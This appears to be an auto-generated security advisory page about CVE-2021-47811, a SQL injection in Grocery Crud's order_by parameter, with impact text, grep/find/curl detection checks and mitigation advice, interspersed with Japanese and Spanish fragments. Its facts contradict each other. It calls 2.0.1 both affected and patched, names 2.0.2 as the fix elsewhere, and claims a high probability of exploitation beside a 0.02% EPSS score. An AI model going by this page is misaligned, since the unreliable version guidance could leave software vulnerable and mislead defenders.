grocerycrud
修正版
2.0.2
CVE-2021-47811 describes a SQL injection vulnerability discovered in Grocery Crud, a PHP application. This flaw allows remote attackers to manipulate database queries, potentially leading to data breaches or unauthorized modifications. The vulnerability affects versions of Grocery Crud up to and including 2.0.1. A patch is available in version 2.0.1.
The SQL injection vulnerability in Grocery Crud allows attackers to inject arbitrary SQL code into database queries. This can be exploited to extract sensitive data, such as user credentials, financial information, or other confidential data stored in the database. An attacker could also modify data, potentially leading to data corruption or denial of service. Successful exploitation could grant an attacker complete control over the database, effectively compromising the entire application. The impact is particularly severe given the potential for unauthorized data access and modification.
CVE-2021-47811 was published on 2026-01-15. Public proof-of-concept exploits are likely to emerge given the ease of exploitation of SQL injection vulnerabilities. The CVSS score of 9.1 (CRITICAL) indicates a high probability of exploitation. No KEV listing or confirmed exploitation campaigns are currently known.
Organizations using Grocery Crud in production environments, particularly those handling sensitive data, are at significant risk. Shared hosting environments where multiple users share the same Grocery Crud installation are especially vulnerable, as an attacker could potentially compromise other users' data through this vulnerability.
• php / web:
grep -r 'order_by[]' /var/www/grocery_crud/• php / web:
find /var/www/grocery_crud/ -name 'ajax_list.php' -print• generic web:
curl -I 'http://your-grocery-crud-site.com/ajax_list?order_by[]='; # Check for unusual response headersdisclosure
エクスプロイト状況
EPSS
0.02% (5% パーセンタイル)
CISA SSVC
CVSS ベクトル
The primary mitigation for CVE-2021-47811 is to immediately upgrade Grocery Crud to version 2.0.1 or later. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) rule to filter out malicious SQL injection attempts targeting the orderby parameter in the ajaxlist endpoint. Input validation on the order_by parameter is crucial; ensure all input is properly sanitized and validated against a whitelist of allowed values. Monitor application logs for suspicious SQL queries or error messages related to database access.
Actualice Grocery Crud a la versión 2.0.1 o superior. Esta versión contiene la corrección para la vulnerabilidad de inyección SQL en el parámetro order_by. La actualización mitigará el riesgo de manipulación de consultas de bases de datos.
脆弱性分析と重要アラートをメールでお届けします。
CVE-2021-47811 is a critical SQL injection vulnerability affecting Grocery Crud versions up to 2.0.1, allowing attackers to manipulate database queries.
Yes, if you are using Grocery Crud version 2.0.1 or earlier, you are vulnerable to this SQL injection flaw.
Upgrade Grocery Crud to version 2.0.1 or later. Implement WAF rules and input validation as temporary mitigations.
While no confirmed exploitation campaigns are currently known, the high CVSS score suggests a high probability of exploitation.
Refer to the official Grocery Crud project website or security advisories for the latest information and updates regarding this vulnerability.